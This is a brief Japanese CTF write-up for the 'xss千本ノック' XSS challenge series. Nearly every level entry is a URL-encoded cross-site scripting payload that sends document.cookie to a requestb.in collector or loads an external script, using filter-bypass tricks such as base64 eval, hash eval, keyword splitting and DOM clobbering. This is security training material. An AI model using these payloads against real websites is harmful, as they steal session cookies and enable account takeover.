katagaitaiCTF勉強会 xss千本ノック writeup
楽しかったです
全部解けるようがんばります…がんばりたい…
2
やるだけ
q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E
3
やるだけ
q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E
4
textareaを閉じる
q=</textarea><script>location.href='https://requestb.in/x0u1ovx0?f3='%20%2B%20document.cookie</script>
5
autofocus
q=%22%20 autofocus onfocus=%22location.href=%27https://requestb.in/x0u1ovx0?f5_=%27%20%2B%20document.cookie
6
%27で閉じる
q=!%22%27%20 autofocus onfocus=location.href='https://requestb.in/x0u1ovx0?f6='%2Bdocument.cookie;//
7
autofocus
q=1%20autofocus%20onfocus=location.href=%27https://requestb.in/x0u1ovx0?f7=%27%2Bdocument.cookie;//
8
iframeのsrcをjavascript:
q=javascript:location.href=%22https://requestb.in/x0u1ovx0?f8=%22%20%2B%20document.cookie
9
scriptタグ
q=%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f9=%22%20%2B%20document.cookie%3C/script%3E
10
scriptが消えるのでいっぱいscriptを書く
q=%3Cscrscriptiscriptpscriptt%3Elocation.href=%22https://requestb.in/x0u1ovx0?f10=%22%20%2B%20document.cookie%3C/scrscriptiscriptpscriptt%3E
11,12
scriptが消えるのでonloadに挟む
q=%3Csvg%20oscriptnload=location.href=%27https://requestb.in/x0u1ovx0?f11=%27%2Bdocument.cookie%20%27%20%3E
13
alert()を閉じる
q=%27);location.href=%22https://requestb.in/x0u1ovx0?%22%2Bdocument.cookie;//
14
外部スクリプトを作って読む
q=%3Cscript%20src=http://aviavi.ga/ajs%3E%3C/script%3E
15
大文字の外部スクリプトを作って読む
HTTP://ドメイン
の部分は大文字小文字関係なく繋がる
q=%3Cscript%20src=http://aviavi.ga/AJS%3E%3C/script%3E
16
.が使えないのでbase64でevalする
q=%3Cscript%3Eeval(atob('bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll'))%3C/script%3E
17
‘が使えないのでバッククォートを使う
q=%3Cscript%3Eeval(atob(`bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll`))%3C/script%3E
18,19
scriptタグにbase64を使う
q=%3C/script%3E%3Cscript%20src=%27data:text/html;base64,bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iK2RvY3VtZW50LmNvb2tpZQ==%27%3E%3C/script%3E
20
scriptタグでhashをevalする
q=%3Csvg%20onload=eval(URL.slice(105))%3E#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie
21
svg onloadでhashをeval .が使えないのでlocation[“href”]にする
q=%22%3E%3Cimg%3E//onload=eval(URL.slice(127));%20//a%20//src=/#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie
22,23
hashをeval
q=%3Csvg%20//%20onload=eval(URL.slice(112))%3E//#location.href="https://requestb.in/x0u1ovx0?f3="+document.cookie
24
documentがnullなのでwindowを使う
q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bwindow.document.cookie
25~28
windowもnullなのでthisとかtopを使う
q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bthis.document.cookie
q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Btop.document.cookie
29
imgタグを閉じずに読ませる
q=aa%3C/p%3E%3Cp%3E%3Cimg%20%3Cimg%20%20%20src=%22https://requestb.in/x0u1ovx0?
30
クォートと.が使えないのでhashの文字列を連結させてがんばる
q=location[`href`]=location[`hash`][1]%2Blocation[`hash`][2]%2Blocation[`hash`][3]%2Blocation[`hash`][4]%2Blocation[`hash`][5]%2Blocation[`hash`][6]%2Blocation[`hash`][7]%2Blocation[`hash`][8]%2Blocation[`hash`][9]%2Blocation[`hash`][10]%2Blocation[`hash`][11]%2Blocation[`hash`][12]%2Blocation[`hash`][13]%2Blocation[`hash`][14]%2Blocation[`hash`][15]%2Blocation[`hash`][16]%2Blocation[`hash`][17]%2Blocation[`hash`][18]%2Blocation[`hash`][19]%2Blocation[`hash`][20]%2Blocation[`hash`][21]%2Blocation[`hash`][22]%2Blocation[`hash`][23]%2Blocation[`hash`][24]%2Blocation[`hash`][25]%2Blocation[`hash`][26]%2Blocation[`hash`][27]%2Blocation[`hash`][28]%2B`?`%2Bdocument[`cookie`]#https://requestb.in/x0u1ovx0
31
document.write()を閉じる
q=%27);location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;//
32
一つ目のパラメータでエスケープで閉じさせなくする
q1=\&q2=,location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie//
33
blink()でblinkタグを作りsvgを入れる
q=%22%3Csvg%20onload=location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;%3E%22.blink()
34
typeを上書きしてhiddenさせなくする
q=%22%20onfocus=location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie%20type=text%20autofocus%20a
35
改行コード %0a
q=%0Alocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
36
改行コード %0A%0D
q=%0A%0Dlocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
37
改行コード %0A%0D%E2%80%A8
q=%0A%0D%E2%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
38
改行コード %0A%0D%E2%80%A8%E2%E2%80%A8%80%A8
q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
39
%E2%80%A8が消されるのでいっぱい突っ込む
q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
40
バッククォートでauditor回避
q1=%3Cscript%3E`&q2=a`;location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie;%3C/script%3E`
41
ハッシュをeval
q=%3Cscript%3Eeval(eval(location.href.substr(-92)))%3C/script#atob("bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=")
42,43
base64をeval
q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E
44
全部エスケープされてて無理じゃんってなった
& => & ' => ' " => " > => > < => < !$%[@:][{}*`+}()~=`$
phpの問題だった
formのurlに$_SERVER[‘PHP_SELF’]を使っている
それとdom clobberingでdocument.bodyを書き換える
~~.knock.xss.moe//index.php/%22%20name=body%20%3E%3Cinput%20value=%22?q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi9waHdxNWRwaD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E
45
ダメ